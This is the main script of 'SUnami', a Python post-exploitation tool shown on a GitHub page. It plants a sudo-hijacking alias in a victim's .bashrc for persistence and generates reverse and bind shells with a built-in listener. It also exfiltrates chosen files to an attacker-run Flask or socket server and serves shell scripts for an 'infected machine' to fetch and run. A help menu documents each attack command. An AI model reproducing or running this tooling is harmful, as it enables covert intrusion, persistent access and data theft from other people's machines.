SUnami/sunami.py at main · malectricasoftware/SUnami · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
# Imports -------------------------------------------------

import lib.payloads as payloads
import lib.parsing as parsing
import lib.banner
import socket
import os
import sys
import time

# Prints Banner for program ------------------------------

print(lib.banner.subanner)
args=parsing.parser()
result=""
escapedres=""

# Functions ---------------------------------------------------------------------------

def routeres(comm, local):
	if local:
		localexec(comm)
	else:
		display(comm)

def display(comm):
	result=f"alias sudo=\"sudo {comm} sudo\";"
	pastetemp=f"paste the following into the infected sudoers .bashrc file:\n\t{result}"
	escapedres=result.replace("\"","\\\"")
	runtemp=f"or run the following command:\n\techo \"{escapedres}\" >> $HOME/.bashrc\n"
	print(pastetemp)
	print(runtemp)

def localexec(comm):
	print("works")
	result=f"alias sudo=\"sudo {comm} sudo\";"
	home=os.environ["HOME"]
	with open(f"{home}/.bashrc","a") as rc:
		rc.write(f"\n{result}")

def genshell(ip, port, protocol, shelltype, shell):
	if shelltype == "bind":
		return payloads.func_dict2[shell](ip, port, protocol)
	else:
		return payloads.func_dict[shell](ip, port, protocol)

# IF statements that allow the user to perform multiple actions ---------------------------------------------

if args.command == "genshell":
	cmd=""
	comm=genshell(args.ip, args.port, args.protocol, args.shelltype, args.shell)
	routeres(comm,args.local)
	if args.listen:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.bind((args.ip, int(args.port)))
			s.listen(1)
			conn, addr = s.accept()
			with conn:
				while True:
					data = conn.recv(1024).decode("utf-8")
					sys.stdout.write(data)
					cmd=input()
					cmd+="\n"
					conn.send(cmd.encode("utf-8"))
					time.sleep(1)
					sys.stdout.write("\033[A" + data.split("\n")[-1])
	elif args.shelltype == "bind":
		print(f"on your machine run the following:\n\tnc {args.ip} {args.port}")
	else:
		print(f"on your machine run the following:\n\tnc -lnvp {args.port}")

if args.command == "exfilfile":
	if args.method == "postflask":
		comm=payloads.Exfil.pflask(args.ip, args.port, args.file)
		routeres(comm, args.local)
		from flask import Flask, request
		app = Flask(__name__)
		@app.route("/up",methods=["POST"])
		def upl():
			if request.files["file"]:
				print(request.files["file"].read())
			return ""
		if __name__ == "__main__":
			app.run(host=args.ip, port=int(args.port))

	else:
		comm=payloads.Exfil.socket(args.ip, args.port, args.file)
		routeres(comm,args.local)

	if args.method == "pysocket":
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.bind((args.ip, int(args.port)))
			s.listen()
			conn, addr = s.accept()
			with conn:
				while True:
					data = conn.recv(1024)
					if data:
						print(data)
						break

	if args.method == "nc":
		print(f"on your machine run the following:\n\tnc -lnvp {args.port}")

if args.command == "rfs":
	comm=payloads.RFS.run(args.ip, args.port, args.schema)
	routeres(comm,args.local)
	from flask import Flask, request, render_template
	app = Flask(__name__)
	@app.route("/rfs",methods=["GET"])
	def rfs(rfvs=args.vars):
		if rfvs:
			rfsvars={v.split(":",1)[0]:v.split(":",1)[1] for v in rfvs}
		else:
			rfsvars=""
		return render_template(os.path.join("rfs",args.file),rfsvars=rfsvars)
	@app.route("/l",methods=["POST"])
	def listen():
		for key in request.form.keys():
			print(f"{key}:{request.form[key]}")
		return ""
	if __name__ == "__main__":
		app.run(host=args.ip, port=int(args.port))

# Help menu -------------------------------------------------------

if args.command == "help":
	print("""
SUnami

help				outputs this page

genshell 			generates the shell to be edited in the bashrc file as an alias
	--ip			ip to connect to
	--port			port to connect to
	--shelltype		type of shell to use (reverse, bind) - default is reverse
	--shell 		type of shell to generate - default is bash
		reverse		bash, nc, nce
		bind		nc
	-protocol		type of protocol, will not affect most shells (tcp, udp) - default is tcp
	-listen			will automatically run a listener after outputting the shell
	usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen]

exfilfile			exfiltrates files using several methods
	--file 			file to exfiltrate
	--method 		method to use (postflask, nc, pysocket)
	--ip			ip to send to
	--port 			port to send to
 	usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]

rfs					runs flask server serving your sh files to run from the attacker machine
	--ip			ip to run server on
	--port 			port to run server on
	--file 			file to run on infected machine
	--vars			<key>:<value> - sets variables in the selected script using jinja2 template syntax - default is no variables
	--schema 		schema to use (http, https) - default http
 	useage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]
""")